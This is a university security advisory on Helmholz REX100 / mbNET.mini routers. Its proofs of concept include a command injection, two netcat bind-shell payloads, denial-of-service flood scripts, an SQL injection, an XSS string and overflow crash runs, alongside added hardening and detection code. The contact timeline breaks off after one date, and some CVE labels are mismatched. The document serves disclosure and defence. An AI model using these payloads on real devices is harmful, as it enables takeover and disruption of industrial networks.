St. Pölten UAS 20250721-0 | Multiple vulnerabilities in Helmholz Industrial Router REX100 / mbNET.mini
| Title | Multiple vulnerabilities in REX100
| Product | Helmholz Industrial Router REX100 / mbNET.mini
| Affected versions | < 2.3.3
| Fixed version | 2.3.3
| CVE numbers | CVE-2025-41673, CVE-2025-41674, CVE-2025-41675, CVE-2025-41676, CVE-2025-41677, CVE-2025-41678, CVE-2025-41679, CVE-2025-41680, CVE-2025-41681
| Impact | High
| Homepage | https://www.helmholz.de/
| | https://mbconnectline.com/
| Found | 2025-04-25
| By | F. Bruckmoser, M. Eder, J. Heigl, M. Heudorn, G. Hofmarcher, M. Kadlec, M. Pristauz-Telsnigg, S. Resch, P. Schweinzer, M. Gschiel
| | These vulnerabilities were found by St. Pölten UAS during research; the coordination was supported by CyberDanube.
| | https://fhstp.ac.at | https://cyberdanube.com
Vendor description
"Helmholz is your specialist for complex products in automation projects. With Helmholz's current, ingenious system solutions, the high demands placed on industrial networks in the age of increasing automation can be met both reliably and efficiently, including a high level of operating convenience. The broad product range extends from decentralised I/O systems to switches and repeaters, gateways, NAT gateways/firewalls and secure IoT remote machine access."
Source: https://www.helmholz.de/en/company/about-helmholz/
Affected versions
Helmholz Industrial Router REX100 < 2.3.3
MBConnectline mbNET.mini < 2.3.3
Vulnerability overview
- Authenticated command injection via send_sms (CVE-2025-41674)
  A command injection vulnerability was found in the device's send_sms function. An authenticated attacker can use it to execute arbitrary commands on the device as root.
- Authenticated command injection via diag (CVE-2025-41673)
  A command injection vulnerability was found in the device's diag function. An authenticated attacker can use it to execute arbitrary commands on the device as root.
- Authenticated command injection via communication.sh (CVE-2025-41675)
  A command injection vulnerability was found in the device's communication.sh endpoint. An authenticated attacker can use it to execute arbitrary commands on the device as root.
- Authenticated denial of service via send_sms (CVE-2025-41677)
  A denial-of-service condition was found in the device's send_sms function. An authenticated attacker can use it to make the device unresponsive until it is rebooted.
- Authenticated denial of service via send_mail (CVE-2025-41676)
  A denial-of-service condition was found in the device's send_mail function. An authenticated attacker can use it to make the device unresponsive until it is rebooted.
- Authenticated SQL injection via cloud-status.sh (CVE-2025-41678)
  A SQL injection vulnerability was found in the device's cloud-status.sh endpoint. An authenticated attacker can use it to read or modify the device's sqlite database.
- Unauthenticated buffer overflow via confnet/serial (CVE-2025-41679)
  A buffer overflow exists in the "serial" function of the device's confnet service. An unauthenticated attacker can use it to crash the service or gain remote code execution on the device.
- Unauthenticated buffer overflow via confnet/command (CVE-2025-41679)
  A buffer overflow exists in the "command" function of the device's confnet service. An unauthenticated attacker can use it to crash the service or gain remote code execution on the device.
- Authenticated persistent XSS via cloud-configure.sh (CVE-2025-41681)
  A persistent XSS vulnerability was found in the device's cloud-configure.sh endpoint. An authenticated attacker can abuse it to execute malicious JavaScript in the browser of a victim who is using the device's web service.
Proof of concept
1) Authenticated command injection via send_sms (CVE-2025-41674)
The send_sms action in the file /cgi-bin/cloud-status.sh is vulnerable to command injection. The following POST request can be used to create the file /hello.txt:
```http
POST /cgi-bin/api.sh HTTP/1.1
Host: 10.69.43.18
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 74
Origin: http://10.69.34.3
DNT: 1
Sec-GPC: 1
Authorization: Basic <redacted>
Connection: keep-alive
Referer: http://10.69.34.3/cgi-bin/cloud-status.sh

action=send_sms&numb='test'&text='test$(echo helloThere > /hello.txt)'
```
2) Authenticated command injection via diag (CVE-2025-41673)
The diag action in the file /cgi-bin/cloud-status.sh is vulnerable to command injection. The following POST request can be used to start a bind shell on port 8080:
```http
POST /cgi-bin/api.sh HTTP/1.1
Host: 10.69.45.3
Content-Length: 71
Authorization: Basic <redacted>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: keep-alive

action=diag&operation=portcheck&parameter=-l -w 9999 -p 8080 -e /bin/sh
```
3) Authenticated command injection via communication.sh (CVE-2025-41675)
The nc action in the file communication.sh is vulnerable to command injection. The following GET request can be used to start a bind shell on port 1337:
```bash
curl 'http://192.168.0.100/cgi-bin/cloudsvr/communication.sh?action=nc&parameter=-l%20-p%201337%20-e%20%2Fbin%2Fsh' \
-H 'Authorization: Basic aGVsbWhvbHo6cm91dGVy' \
--insecure
```
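The three command injections above share one root cause: a request parameter (`parameter`, `numb`, `text`) is spliced into a command line that a shell interprets. As an added illustration, not code from the advisory or the vendor, the snippet below contrasts that unsafe pattern with a hardened handler that validates each field against an allowlist and hands over an argv list, so no shell ever sees the input. The assumed shape of the port check (`nc -z -w 3 <host> <port>`) and the `/usr/bin/sms-send` helper are placeholders; the device's real command lines are not published.

```python
import ipaddress
import re

# Assumed shape of the device's "portcheck" diagnostic: `nc -z -w 3 <host> <port>`. The real
# command line behind the CGI script is not published; the helper paths below are placeholders.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?(\.[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?)*$", re.I)
E164_RE = re.compile(r"^\+?[0-9]{3,15}$")  # bare digit string accepted as an SMS recipient


def portcheck_command_unsafe(parameter: str) -> str:
    """Vulnerable pattern: the request parameter is spliced into a shell command line, so
    '-l -w 9999 -p 8080 -e /bin/sh' turns a port check into a listening shell."""
    return f"nc -z -w 3 {parameter}"


def valid_host(host: str) -> bool:
    """Accept an IPv4/IPv6 literal or a syntactically valid hostname, nothing else.
    Quoting alone would not help here: a 'host' of -l is one harmless-looking shell
    argument yet still an option to nc, so the allowlist is the primary control."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return bool(HOSTNAME_RE.match(host))


def portcheck_argv_safe(host: str, port: str) -> list:
    """Hardened: validate each field, then return an argv list that is executed without a
    shell (e.g. subprocess.run(argv)), so metacharacters and extra options stay inert."""
    if not valid_host(host):
        raise ValueError(f"invalid host: {host!r}")
    if not port.isdigit() or not 1 <= int(port) <= 65535:
        raise ValueError(f"invalid port: {port!r}")
    return ["nc", "-z", "-w", "3", host, port]


def sms_argv_safe(number: str, text: str) -> list:
    """send_sms: the recipient must be a bare digit string and the message is handed over
    as one argv element, so $(...) or backticks inside it are never interpreted."""
    if not E164_RE.match(number):
        raise ValueError(f"invalid number: {number!r}")
    return ["/usr/bin/sms-send", number, text]  # hypothetical helper binary
```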
4) Authenticated denial of service via send_sms (CVE-2025-41676)
The send_sms action is vulnerable to a denial-of-service condition. By sending multiple requests, the system becomes unresponsive:
```python
import requests
from concurrent.futures import ThreadPoolExecutor

HOST = "10.69.43.18"
PATH = "/cgi-bin/api.sh"
LENGTH = 512    # size of the numb/text values
ATTACKS = 1000  # number of requests sent concurrently

param = {
    'action': 'send_sms',
    'numb': 'X' * LENGTH,
    'text': 'X' * LENGTH,
}
url = f'http://{HOST}{PATH}'

def send_request(i):
    with requests.Session() as s:
        s.auth = ('helmholz', 'router')
        print(f'[+] - Sending Packet NR {i+1}...')
        s.post(url, data=param)

# one worker per request, so all requests are in flight at once
with ThreadPoolExecutor(max_workers=ATTACKS) as executor:
    executor.map(send_request, range(ATTACKS))
```
5) Authenticated denial of service via send_mail (CVE-2025-41677)
The send_mail action is vulnerable to a denial-of-service condition. By sending multiple requests, the system becomes unresponsive:
```python
#!/usr/bin/env python3
import requests
from concurrent.futures import ThreadPoolExecutor

HOST = "10.69.43.18"
PATH = "/cgi-bin/api.sh"
LENGTH = 24     # size of the addr/subj/text values
ATTACKS = 5000  # number of requests sent concurrently

param = {
    'action': 'send_email',
    'addr': 'X' * LENGTH,
    'subj': 'X' * LENGTH,
    'text': 'X' * LENGTH
}
url = f'http://{HOST}{PATH}'

def send_request(i: int) -> None:
    try:
        with requests.Session() as session:
            session.auth = ('helmholz', 'router')
            print(f'[+] Sending packet #{i + 1} ...')
            session.post(url, data=param, timeout=10)
    except requests.RequestException as exc:
        print(f'[-] Packet #{i + 1} failed: {exc}')

def main() -> None:
    # one worker per request, so all requests are in flight at once
    with ThreadPoolExecutor(max_workers=ATTACKS) as executor:
        executor.map(send_request, range(ATTACKS))

if __name__ == "__main__":
    main()
```
6) Authenticated SQL injection via cloud-status.sh (CVE-2025-41678)
A SQL injection vulnerability was found in the device's cloud-status.sh endpoint. An attacker can use it to manipulate data inside the sqlite database:
```http
POST /cgi-bin/cloud-status.sh HTTP/1.1
Host: 10.69.35.3
Content-Length: 104
Authorization: Basic aGVsbWhvbHo6cm91dGVy
X-Requested-With: XMLHttpRequest
Accept-Language: en-US,en;q=0.9
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Origin: http://10.69.45.3
Referer: http://10.69.45.3/cgi-bin/cloud-status.sh
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

language=test%27%29%3B%20REPLACE%20INTO%20config%20%28name%2Cvalue%29%20VALUES%28%27hacked%27%2C%27yes
```
Verification shows the manipulated data:
```text
$ echo "SELECT * FROM config WHERE name = 'hacked';" | sqlite3 /etc/db/config
hacked|yes
```
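The decoded payload reads `test'); REPLACE INTO config (name,value) VALUES('hacked','yes`: it closes the string literal the script opened, appends a second statement, and lets the script's own trailing `')` complete it. As an added example (not the advisory's or the vendor's code), the snippet below reproduces that against an in-memory stand-in for /etc/db/config and shows the fix: an allowlist plus a bound parameter. The `config(name, value)` schema and the `{"en", "de"}` allowlist are assumptions.

```python
import sqlite3

# The advisory's injection payload (the `language` parameter, URL-decoded).
PAYLOAD = "test'); REPLACE INTO config (name,value) VALUES('hacked','yes"
SUPPORTED_LANGUAGES = {"en", "de"}  # assumed allowlist for the UI language setting


def fresh_db() -> sqlite3.Connection:
    """Constructed stand-in for /etc/db/config: a name/value table (schema assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE config (name TEXT PRIMARY KEY, value TEXT)")
    conn.execute("INSERT INTO config VALUES ('language', 'en')")
    return conn


def set_language_unsafe(conn: sqlite3.Connection, language: str) -> None:
    """Vulnerable pattern: the value is spliced into SQL text and run as a script, which is
    what `echo "..." | sqlite3` in a shell CGI amounts to. The script's closing `')`
    completes the attacker's second statement."""
    conn.executescript(
        f"REPLACE INTO config (name,value) VALUES('language','{language}')"
    )


def set_language_safe(conn: sqlite3.Connection, language: str) -> None:
    """Hardened: allowlist the value, then bind it as a parameter so it can never terminate
    the string literal or append a statement."""
    if language not in SUPPORTED_LANGUAGES:
        raise ValueError(f"unsupported language: {language!r}")
    conn.execute("REPLACE INTO config (name,value) VALUES('language',?)", (language,))
    conn.commit()


def dump(conn: sqlite3.Connection) -> dict:
    """Return the whole config table as {name: value}."""
    return dict(conn.execute("SELECT name, value FROM config"))
```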
7) Unauthenticated buffer overflow via confnet/serial (CVE-2025-41679)
The overflow is located inside the confnet binary. Exploiting it requires the device's serial number. The script from SySS was used to interact with the service
(www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-063.txt):
```text
$ ./cve-2024-45274.py info 192.168.0.100
[*] Getting device info...
[+] Received response from ('192.168.0.100', 25353):
R50168542
$ python3 cve-2024-45274.py cmd
R501685420000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000 192.168.0.100 get_fw
$ ./cve-2024-45274.py info 192.168.0.100
[*] Getting device info...
[!] No response received within 3 seconds.
[!] No response received within 3 seconds.
```
8) Unauthenticated buffer overflow via confnet/command (CVE-2025-41679)
The overflow is located inside the confnet binary. Exploiting it requires the device's serial number. The script from SySS was used to interact with the service
(www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-063.txt):
```text
$ ./cve-2024-45274.py info 192.168.0.100
[*] Getting device info...
[+] Received response from ('192.168.0.100', 25353):
R50168542
$ python3 cve-2024-45274.py cmd R50168542 192.168.0.100
'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbb
bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbccccccccccccccccccccccccccccccccccccccccccccc
ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
cccccccccccccccccccccccccccccccccccccccccccccdddddddddddddddddddddddddddddddddd
ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddeeeeeeeeeeeee
eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee
eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee
eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeffffffffffffffffffffffffffffffffffffffffff
fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
fffffffffffffffffffffffffffffffffffff'
$ ./cve-2024-45274.py info 192.168.0.100
[*] Getting device info...
[!] No response received within 3 seconds.
[!] No response received within 3 seconds.
```
9) Authenticated persistent XSS via cloud-configure.sh (CVE-2025-41681)
A persistent XSS vulnerability was found in the device's cloud-configure.sh endpoint. An authenticated attacker can use it to inject arbitrary JavaScript, which is executed when the "help" page is visited. The impact of this vulnerability is very limited:
```http
POST /cgi-bin/cloud-status.sh HTTP/1.1
Host: 192.168.0.100
Content-Length: 250
Authorization: Basic aGVsbWhvbHo6cm91dGVy
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqWdUJv1Cc3G8GgCm
Accept: text/html,application/xhtml+xml,application/xml;
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

------WebKitFormBoundaryqWdUJv1Cc3G8GgCm
Content-Disposition: form-data; name="langchange"

1
------WebKitFormBoundaryqWdUJv1Cc3G8GgCm
Content-Disposition: form-data; name="language"

";alert(1)//"
------WebKitFormBoundaryqWdUJv1Cc3G8GgCm--
```
These vulnerabilities were verified manually on an emulated device using the MEDUSA scalable firmware runtime (https://medusa.re).
Solution
Update to the latest version.
Workaround
Restrict network access to the device or remove the device where possible.
Recommendation
St. Pölten UAS recommends Helmholz customers to upgrade the firmware to the latest available version. A security assessment by a professional company is recommended.
Contact timeline
2025-06-11:
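Until the 2.3.3 firmware is rolled out, operators can watch the device's web endpoints for the request shapes shown in the proofs of concept above. The following detection logic is an added example, not part of the advisory: it runs over a constructed log of (source IP, method, path, query or body) tuples that mirror PoCs 1, 2, 3, 6 and 9, flags shell metacharacters on the shell-backed CGI handlers, SQL and script injection on cloud-status.sh, the `nc` action on communication.sh, and a per-source flood of send_sms/send_email calls (PoCs 4 and 5). The log format and the `DOS_THRESHOLD` of 50 are assumptions to adapt to a real reverse proxy or WAF log.

```python
import re
from collections import Counter
from urllib.parse import parse_qs

# Constructed sample log in the shape (source_ip, method, path, query_or_body). The first
# five entries mirror the advisory's PoCs; the remaining ones are legitimate-looking traffic.
SAMPLE_LOG = [
    ("10.69.34.3", "POST", "/cgi-bin/api.sh", "action=send_sms&numb='test'&text='test$(echo helloThere > /hello.txt)'"),
    ("10.69.34.3", "POST", "/cgi-bin/api.sh", "action=diag&operation=portcheck&parameter=-l -w 9999 -p 8080 -e /bin/sh"),
    ("10.69.34.3", "GET", "/cgi-bin/cloudsvr/communication.sh", "action=nc&parameter=-l%20-p%201337%20-e%20%2Fbin%2Fsh"),
    ("10.69.34.3", "POST", "/cgi-bin/cloud-status.sh", "language=test%27%29%3B%20REPLACE%20INTO%20config%20%28name%2Cvalue%29%20VALUES%28%27hacked%27%2C%27yes"),
    ("10.69.34.3", "POST", "/cgi-bin/cloud-status.sh", "langchange=1&language=%22%3Balert%281%29%2F%2F%22"),
    ("10.69.34.5", "POST", "/cgi-bin/api.sh", "action=send_sms&numb=%2B43123456&text=pump+3+stopped"),
] + [("10.69.34.9", "POST", "/cgi-bin/api.sh", "action=send_email&addr=a%40b.c&subj=x&text=x")] * 60

# Shell metacharacters or netcat's -e in values reaching the shell-backed CGI handlers.
SHELL_META = re.compile(r"[$`;|&]|-e\s*/bin/sh")
# Quote/paren/semicolon statement break or DML keywords in cloud-status.sh parameters.
SQL_META = re.compile(r"['\"]\s*\)\s*;|\b(REPLACE|INSERT|UPDATE|DELETE|DROP|UNION)\b", re.I)
XSS_META = re.compile(r"<|alert\s*\(|javascript:|[\"']\s*;", re.I)
CHECKS = {
    "/cgi-bin/api.sh": [("command-injection", SHELL_META)],
    "/cgi-bin/cloudsvr/communication.sh": [("command-injection", SHELL_META)],
    "/cgi-bin/cloud-status.sh": [("sql-injection", SQL_META), ("xss", XSS_META)],
}
NOTIFY_ACTIONS = {"send_sms", "send_email"}
DOS_THRESHOLD = 50  # notification requests per source; tune to the site's real usage


def analyze(log):
    """Return (source_ip, path, finding) tuples for suspicious requests in the log."""
    findings, notify_count = [], Counter()
    for src, _method, path, raw in log:
        params = parse_qs(raw, keep_blank_values=True)  # also URL-decodes the values
        action = params.get("action", [""])[0]
        if path.endswith("communication.sh") and action == "nc":
            findings.append((src, path, "netcat-action"))
        for label, pattern in CHECKS.get(path, []):
            if any(pattern.search(v) for values in params.values() for v in values):
                findings.append((src, path, label))
                break
        if action in NOTIFY_ACTIONS:
            notify_count[src] += 1
    for src, n in notify_count.items():
        if n >= DOS_THRESHOLD:
            findings.append((src, "/cgi-bin/api.sh", f"notification-flood:{n}"))
    return findings
```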